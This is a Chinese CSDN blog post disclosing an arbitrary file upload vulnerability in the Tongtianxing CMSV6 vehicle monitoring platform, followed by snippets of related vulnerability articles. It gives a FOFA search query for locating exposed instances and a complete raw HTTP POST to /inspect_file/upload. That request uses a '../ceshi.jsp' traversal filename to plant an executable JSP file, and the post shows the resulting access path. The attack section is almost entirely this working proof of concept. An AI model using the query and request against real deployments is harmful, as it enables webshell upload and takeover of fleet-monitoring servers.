鸿运(通天星CMSV6车载)主动安全监控云平台inspect_file/upload存在任意文件上传漏洞

最新推荐文章于 2024-06-24 18:41:50 发布
最新推荐文章于 2024-06-24 18:41:50 发布
阅读量824 收藏 5
点赞数 22
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137373231
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。

漏洞描述

鸿运(通天星CMSV6车载)主动安全监控云平台存在inspect_file/upload存在任意文件上传漏洞

 资产搜索

body="./open/webApi.html" || body="/808gps/"

漏洞复现

POST /inspect_file/upload HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 219
Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b

--2e7688d712bcc913201f327059f9976b
Content-Disposition: form-data; name="uploadFile"; filename="../ceshi.jsp"
Content-Type: application/octet-stream

<% out.println("ceshi"); %>
--2e7688d712bcc913201f327059f9976b--

上传路径:

http://127.0.0.1/upload/software/13201203286126400_ceshi.jsp

cn_大腿
关注
  • 22
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现】天星CMSV6车载监控平台Login弱口令漏洞
晚风不及你
04-25 88
天星CMSV6车载视频监控平台存在弱口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
漏洞复现】天星-CMSV6-inspect_file-upload-文件上传
知黑而守白
03-27 276
天星CMSV6车载视频监控平台是东莞市天星软件科技有限公司研发的监控平台,天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。天星CMS系统 upload 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞复现
最新发布
0xSec
06-24 770
2024年5月,天星CMSV6发布新版本修复了一处SQL注入漏洞漏洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞过SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞
天星CMSV6 车载定位监控平台 任意文件上传漏洞复现(XVE-2023-23454)
0xSec
03-31 595
天星CMSV6 车载定位监控平台upload接口处存在文件上传漏洞,攻击者可过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。
超级CMS2.39-文件上传漏洞
LYJ20010728的博客
06-21 695
超级CMS2.39-文件上传漏洞环境搭建漏洞复现上传点一上传点二上传点三漏洞分析 环境搭建 下载超级CMS V2.39,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 上传点一 上传点二 上传点三 漏洞分析 存在漏洞的位置file.class.php文件中的getFileExtName方法 public function getFileExtName($filename){ $filename
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1834
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
文件上传漏洞-解析漏洞CMS漏洞、编辑器漏洞、CVE等漏洞
硫酸超的博客
08-12 552
演示案例 CVE-2017-12615-上传-Tomcat 中间件解析漏洞+配合文件上传测试 IIS-上传-解析-(panfei806) 修改filepath的值为/1 路径就会变成 /12001001.jpg 那么如果将filepath的值改为 /1.php; 那么路径就会变成/1.php;12001001.jpg被当做php文件执行 效果: Apache-上传-解析-vulhub Nginx-上传-解析-vulhub ...
鸿运(天星CMSV6车载)主动安全监控云平台任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-27 623
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。鸿运(天星CMSV6车载)主动安全监控云平台
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
74cms v4.2.X任意文件读取漏洞
09-06
在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
cms.zip_/cms/admin/main.php_CMS + PHP_cms_php cms
09-24
【标题】"cms.zip_/cms/admin/main.php_CMS + PHP_cms_php cms" 提供了关于这个压缩包的核心信息,它包含了一个名为“main.php”的文件,位于“/cms/admin/”目录下,这常是一个内容管理系统(CMS)的后台管理入口...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
### eyoucms V1.0.4 后台任意文件读取漏洞详解 #### 漏洞背景 易优CMS(eyoucms)是一款基于PHP+MySQL开发的企业级建站系统,广泛应用于中小企业的网站搭建。它支持多平台访问,包括PC端、移动端以及微信平台。...
文件上传漏洞
heiseweiye的博客
09-24 1163
1.1文件上传漏洞概述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,有时候几乎没有什么技术门槛(以上内容摘自白帽子讲web安全) 1.2过滤(格式限制) 常我们所上传的文件格式是被限制的,而要上传一个PHP文件,可以利用验证扩展名的方式存在的问题进行绕过,另外是结合PHP和系统的特性,导致了可以截断文件名来绕...
WEB漏洞攻防 - 文件上传漏洞 - CMS类应用场景 - [见文章头]任意文件上传漏洞
易编橙 · 终身成长社群,相遇已是上上签!
09-03 882
思考:在实际应用场景中,常规类的文件上传CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
【代码审计】QYKCMS_v4.3.2 任意文件上传漏洞分析
12-03 532
&#13;  &#13; 0x00 环境准备&#13; QYKCMS官网:http://www.qykcms.com/&#13; 网站源码版本:QYKCMS_v4.3.2(企业站主题)&#13; 程序源码下载:http://bbs.qingyunke.com/thread-13.htm&#13; 测试网站首页:&#13;  &#13; 0x01 代码分析&#13; 1、漏洞文...
文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2218
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS
eyoucms后台插件模块存在任意文件上传导致getshell 74cms v3.6前台存在mysql数据
06-09
感谢您向我提出问题。这些都是严重的安全问题,需要尽快得到解决。 对于eyoucms后台插件模块任意文件上传漏洞,建议您立即升级eyoucms或者删除该插件,以避免攻击者利用此漏洞攻击您的系统。如果您已经受到攻击,建议您立即停止服务器,并进行全面检查和修复。 对于74cms v3.6前台存在mysql数据漏洞,建议您立即升级到最新版本,并将所有输入数据进行过滤和验证,以避免SQL注入攻击。同时,建议您对服务器进行全面检查和修复,以确保系统的安全性。 总的来说,保持系统的安全性需要您不断地关注漏洞信息,并及时采取相应的措施,同时也需要您加强对系统的安全性监控和防御能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值